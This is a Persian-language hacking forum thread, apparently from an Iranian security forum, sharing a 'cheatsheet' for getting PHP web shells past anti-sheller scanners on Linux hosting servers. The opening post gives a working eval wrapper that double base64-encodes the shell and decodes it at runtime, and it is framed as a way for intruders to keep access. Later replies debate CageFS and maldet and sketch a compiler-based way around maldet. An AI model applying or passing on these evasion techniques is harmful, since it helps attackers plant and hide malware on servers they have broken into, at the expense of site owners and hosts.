SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Anti Sheller Bypassing Cheatsheet

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Anti Sheller Bypassing Cheatsheet

    سلامی دوباره خدمت تمامی دوستان.
    در این تاپیک به بررسی روش های بایپس آنتی شلرها در سرورهای لینوکس میپردازیم.
    آنتی شلرها خیلی وقت ها مشکلات زیادی رو برای نفوذگرها ایجاد می کنند به طور مثال نفوذگر چندین ساعت سعی کرده تا از سرور دسترسی بگیره و حالا که میخواد شلر مورد نظرش رو اجرا کنه با خطای Not Found مواجه میشه که ناشی از پاک شدن شل توسط آنتی شلر سرور هست و در صورتی که مدیر سرور خیلی روی امنیت حساسیت به خرج داده باشه آنتی شلر رو طوری تنظیم میکنه تا به محض شناسایی شلر در اون اکانت، اکانت ساسپند میشه !
    چنانچه دوستان ایده ای دارند میتوانند همینجا مطرح کنند تا بررسی و در موردش گفتگو شود.
    خب شروع می کنیم.
    بنده یک روش رو مطرح میکنم که بارها خودم تست کردم و ازش نتیجه گرفتم که برای اجرای فایل PHP که دارای کدهای مخرب هست یا همون Sheller به کار میره.
    روش کار به شکل زیر هست :
    1- فرض کنید ما یک فایل PHP با محتوای زیر داریم و میخوایم اجرا کنیم و میدونیم که آنتی شلر سرور جلوی اجرا شدنش رو میگیره  :

    [php]
    <?php
    echo 'iranhack.com';
    ?>
    [/php]

    البته این کد فقط یک مثال هست وگرنه همه ما میدونیم که هیچ آنتی شلری جلوی اجرای این کد رو نمیگیره :4:

    2- خب حالا کد بالا رو به شکل زیر Encode میکنیم :
    کاراکترهای php?> در ابتدای کد و <? در انتهای کد رو حذف میکنیم و سپس کدهای باقی مانده رو 2 بار به روش Base64 اینکد میکنیم. ( حتماً باید دو بار اینکد بشه در غیر اینصورت جوابگو نیست )
    طبق توضیحات بالا کد مورد نظر ما برای اجرا پس از 2 بار اینکد شدن به این شکل میشه :



    کد:
    WldOb2J5QW5hWEpoYm1oaFkyc3ViM0puSnp0PX==
    که اگر دو بار دیکدش کنید میشه این کد :



    کد:
    echo 'iranhack.com';
    خب حالا ما Encoding رو انجام دادیم.

    3- کد اینکد شده رو در متغیر code$ و بین ' ' در کد زیر قرار دهید :

    [php]
    <?php
    $code = 'WldOb2J5QW5hWEpoYm1oaFkyc3ViM0puSnp0PX==';
    $irh=base64_decode('JGlyaD1iYXNlNjRfZGVjb2RlKCdZbU Z6WlRZMFgyUmxZMjlrWlE9PScpOy=');
    eval($irh);
     eval($irh($irh("$code")));
     ?>
    [/php]

    خب حالا با خیال راحت فایل PHP مورد نظرتون رو به این شکل اینکد کرده و اجرا کنید.
    تنها مشکل این روش این هست که در صورتی که تابع base64_decode در تنظیمات php سرور غیرفعال شده باشه این روش جوابگو نیست اما این مسئله خیلی کم پیش میاد که مدیر سرور مخصوصا در سرورهای اشتراکی، این فانکشن رو ببنده چون یک سری ابزارهای سرور با بسته شدن این فانکشن از کار می افتند. مثلا سرویس مدیریت ایمیل Round Cube در صورت بسته بودن این تابعدر قسمت Login دچار مشکل میشه.
    پس این روش در سرورهای اشتراکی 99% جوابگو هست و در سرورهای اختصاصی هم در صورت بسته نبودن تابع در تنظیمات PHP جوابگو هستش. اما در سرورهای اختصاصی چون معمولاً یک یا دو سایت بیشتر روی سرور میزبانی نمیشوند مدیر سرور به اختیار خودش میتونه این تابع رو باز بزاره یا ببنده.
    موفق باشید
     
    [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

    همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
     

  • #2
    RE: Anti Sheller Bypassing Cheatsheet

    درود !

    سرور های امروز مثل قبل نیست عزیز [img]images/smilies/Smileys/105.gif[/img]
    من رو سرورم Cage FS نصبە  کە 100000 شل هرجوری کە دوست داری آپلود کن اجرا نمیشە و فوری پاک میشە !
    هر شل کە دوست داری بریز اجرا نمیشە [img]images/smilies/Smileys/111.gif[/img]

    پس باید بیخیال شد

    نظر


    • #3
      RE: Anti Sheller Bypassing Cheatsheet

      نوشته اصلی توسط 'dlshad' pid='7161' dateline='1420276651'
      درود !

      سرور های امروز مثل قبل نیست عزیز [img]images/smilies/Smileys/105.gif[/img]
      من رو سرورم Cage FS نصبە  کە 100000 شل هرجوری کە دوست داری آپلود کن اجرا نمیشە و فوری پاک میشە !
      هر شل کە دوست داری بریز اجرا نمیشە [img]images/smilies/Smileys/111.gif[/img]

      پس باید بیخیال شد

       
      درود
      Cage Fs یوزرها رو از یکدیگر ایزوله میکنه و ربطی به اجرا شدن یا نشدن شلر در سرور نداره !
      بنده چیزی رو که تست کردم و امکان پذیر بوده برای دوستان شرح دادم. هدف این تاپیک هم بحث و گفتگو راجع به همین موارد هست. شما پیشنهاد جدیدتری دارید بسم الله...
      ولی اینکه میگید " پس باید بیخیال شد " به نظر من جمله منطقی نیست چون همیشه یک راهی برای بایپس وجود داره...
      موفق باشید
       
      [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

      همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
       

      نظر


      • #4
        RE: Anti Sheller Bypassing Cheatsheet

        یە هاست واست بسازم تست کنی ؟
        Cage FS انتی  هست عزیز [img]images/smilies/Smileys/105.gif[/img]
        قیمتش هم 300 دلارە 

         

        نظر


        • #5
          RE: Anti Sheller Bypassing Cheatsheet

          نوشته اصلی توسط 'dlshad' pid='7163' dateline='1420278747'
          یە هاست واست بسازم تست کنی ؟
          Cage FS انتی  هست عزیز [img]images/smilies/Smileys/105.gif[/img]
          قیمتش هم 300 دلارە 

           

           
          بنده حرف شما رو رد نمی کنم . متودهای زیادی برای بایپس وجود داره و ممکن هست برخی از این متودها روی همه سرورها جوابگو نباشه خب این یه چیز طبیعی هست و بستگی به نوع کانفیگ مدیر سرور داره.
          در مورد Cage FS هم پیشنهاد میکنم بیشتر مطالعه کنید :

          http://docs.cloudlinux.com/cagefs.html
          http://blog.hawkhost.com/2013/02/28/introducing-cagefs-a-quick-overview/

          در هیچ یک از این منابع که معتبرترینش هم سایت Cloud Linux هست موردی گفته نشده که Cage FS به عنوان یک آنتی شلر یا آنتی ویروش استفاده میشه.
          پیروز باشید
           
          [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

          همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
           

          نظر


          • #6
            RE: Anti Sheller Bypassing Cheatsheet

            درستە رو Cloud Linux  اما  هروقت خریدی بعد میفهمی کە واقعا چطورە چون خودش از شل جلوگیری میکنە 99% شل ها اجرا نمیشە !
            و پیشنهاد من کنار این دوتا Maldet Anti Sheller کە واقعا میشە گفت امنیت 99% میشە !

            البتە اینا هم رایگان نیست اما اگە واقعا میخای سرورت کامل پرفکت باشە اینا کافیە !

            با تشکر ،

            نظر


            • #7
              RE: Anti Sheller Bypassing Cheatsheet

              بنده سرورهای زیادی رو دیدم که Cage FS داشتن و همه جور شلری هم روشون اجرا می شده. حتی c99 هم یادم هست که روی یک سرور که cage fs داشت اجرا کردم حتی بدون این روش !
              مطمئناً اون برنامه ای که از اجرای شل در سرور شما جلوگیری میکنه Cage FS نیست.
               
              [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

              همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
               

              نظر


              • #8
                RE: Anti Sheller Bypassing Cheatsheet

                درود[align=left]At the same time, user's environment will be fully functional, and user should not feel in any way restricted. No adjustments to user's scripts are needed. CageFS will cage any scripts execution done via:[/align] [align=left]
                Apache (suexec, suPHP, mod_fcgid, mod_fastcgi)
                [/align][align=left]
                LiteSpeed Web Server
                [/align][align=left]
                Cron Jobs
                [/align][align=left]
                SSH
                [/align][align=left]
                Any other PAM enabled service
                [/align][align=left]* Note: mod_php is not supported, MPM ITK requires custom patch [/align]اگه شما لینکی که مدیر عزیز گذاشته رو خوب مطالعه کرده باشی و مخصوصا به متن بالا و قسمتی که قرمز هست دقت کرده باشی متوجه میشی که کارش ایزوله یا به طور ساده تر جدا کردن تمامی قسمت های یک یوزر از یوزر دیگس و هر اسکریپتی که از طریق هر کدوم از اون گزینه های بالا خواسته باشه اجرا بشه رو ازش جلو گیری میکنه!(اجازه استفاده داری ولی فقط داخل یوزر خودت اجرا میشن!!)
                پس!!!!!!!!!![img]images/smilies/Smileys/76.gif[/img]
                آنتی شلر یا به طور ساده تر زد شل نیست!!

                پ.ن: ضد شل یعنی وقتی شلی توی سرور آپلود شد فورا اون رو پاک کنه و یا اجازه دسترسی بهش رو به کسی نده!!(صرفا جهت اطلاع دوستانی که نمیدونستن)!
                [align=center]My Email: [email protected]
                [/align][align=left]mov problems,hell
                sub me,pain
                add me,love
                inc pleasure
                inc adrenaline
                push limits
                call hopeForAbetterTomorrow[/align]

                نظر


                • #9
                  RE: Anti Sheller Bypassing Cheatsheet

                  روسرور انتی شل و انتی ویروس نصب

                  و به صورت REALTIME

                  برا همین شل میخوره 


                  ودر ضمن روشهای امن سازی سرور زیاده و فقط محدود به نصب انتی نمیشه


                  و برحسب مثال با محدود کردن php,ini .... میشه جلوگیری کزد

                  ببینید



                  *** لینک حدف گردید ****

                  واین سرور بسیار امن وایزوله هستن
                  [align=center][align=right]When danger lurks in unknown waters, we are there to help you swim[/align][/align]

                  نظر


                  • #10
                    RE: Anti Sheller Bypassing Cheatsheet

                    [img]images/smilies/Smileys/21.gif[/img][img]images/smilies/Smileys/21.gif[/img][img]images/smilies/Smileys/21.gif[/img]
                    با بقیه جملاتت کار ندارم
                    فقط همین یه تیکه رو دوباره توضیح بده!!:
                    روسرور انتی شل و انتی ویروس نصب

                    و به صورت REALTIME

                    برا همین شل میخوره 
                    امن و ایزوله [img]images/smilies/Smileys/24.gif[/img]
                    [align=center]My Email: [email protected]
                    [/align][align=left]mov problems,hell
                    sub me,pain
                    add me,love
                    inc pleasure
                    inc adrenaline
                    push limits
                    call hopeForAbetterTomorrow[/align]

                    نظر


                    • #11
                      RE: Anti Sheller Bypassing Cheatsheet

                      بحث مورد علاقه من [img]images/smilies/Smileys/78.gif[/img]
                      بهمن جان  cagefs فقط کارش قفسه بندی هست به صورت شی گرا با زبان سی شما میتونید همراه با کرنلی که در حال اجرا هست چندین کامپایلر اجرا کنید در کنار هم حالا cagefs میاد همین کارو میکنه با این تفاوت که برا هر یوزری که دارای شل در /etc/passwd باشه یک کامپایلر جدا تعریف میکنه بدین صورت وقتی شما در رابط متنی خودتون یا همون شل دستوری وارد میکنید کامپایلر به صورت اختصاصی برای خودتون هست یک مثال ساده بزنم فایل /usr/bin/perl رو در نظر بگیر ببر تو یه فولدر جدا تو یه یوزر جدا با پرمیشن بندی جدا حالا فایل رو به صورت ./perl file.pl اجرا کن تازه میفهمی cagefs چی هست !
                      این که شما میگی شل اجرا نمیشه بخاطر maldet هست که به دیتابیس clamav و دیتابیس اختصاصی خود lmd وصل هست و بسیاری از الگوهای مخرب توی این دیتابیس هست و واسه همینه که شل ها پاک میشه ربطی به کلود لینوکس یا ... نداره.
                      یه راه خیلی ساده برای بایپس این ماژول رو قبلا تو یه فیلمی اشاره کرده بودم بهش ... استفاده از کامپایلری جدا روی یوزر توسط خود یوزر به صورت هماهنگ با کامپایلر اصلی میتونه این ماژول رو دور بزنه اما خوب اونا هم احمق نیستند و راه و روش خودشون رو دارن مثل محدود کردن فایلی هایی که شما میتونید باهاش زبان سی رو اجرا کنید ...

                      نظر


                      • #12
                        RE: Anti Sheller Bypassing Cheatsheet

                        دقیقا چیش برات خنده داره

                        پستهای خودت ببین کمی به اونا هم بخند فقظ بپا پاره نشی [img]images/smilies/Smileys/21.gif[/img][img]images/smilies/Smileys/139.gif[/img]
                        [align=center][align=right]When danger lurks in unknown waters, we are there to help you swim[/align][/align]

                        نظر


                        • #13
                          RE: Anti Sheller Bypassing Cheatsheet

                          دوستان عزیز حتی در بحث های علمی احترام به یکدیگر فراموش نشه نمیدونم کدوم نامسلمونی این جو ها رو توی انجمن های ایرانی مد کرده .

                          همه اعضا برای ما دارای احترام هستند و در صورتی که احساس کنیم داره به کسی بی احترامی میشه با فرد متخلف برخورد خواهیم کرد.


                          یا حق
                          [align=center][/align]

                          نظر


                          • #14
                            RE: Anti Sheller Bypassing Cheatsheet

                            [align=right]$irh هم دوبار انکد شده ی کلمه base64_decode هست درسته ؟؟ 
                            فقط ی سوال .. 
                            کلمه base64_decode رو اگه بخایم تو متغیر بزاریم به طوری که بتونه بصورت دستور اجرا بشه باید توی ' ' قرار نگیره یا فرقی نداره ؟!؟[/align]

                            نظر


                            • #15
                              RE: Anti Sheller Bypassing Cheatsheet

                              [align=right]درود.[php]$irh=base64_decode('YmFzZTY0X2RlY29kZQ==');[/php][/align] 
                              کد:
                              YmFzZTY0X2RlY29kZQ==  =  base64_decode
                              [align=right] [/align][align=right]
                              چنانچه قصد داشته باشید از تابع base64_decode در کد مورد نظر استفاده کنید ( فرقی نداره که در متغیر تعریف بشه یا به هرشکل دیگه ) باید مقدار تابع را در بین دو کوتیشن ( ' ) یا دو single کوتیشن  ( " ) قرار دهید.

                              موفق باشید[/align]
                               
                              [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

                              همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
                               

                              نظر

                              صبر کنید ..
                              X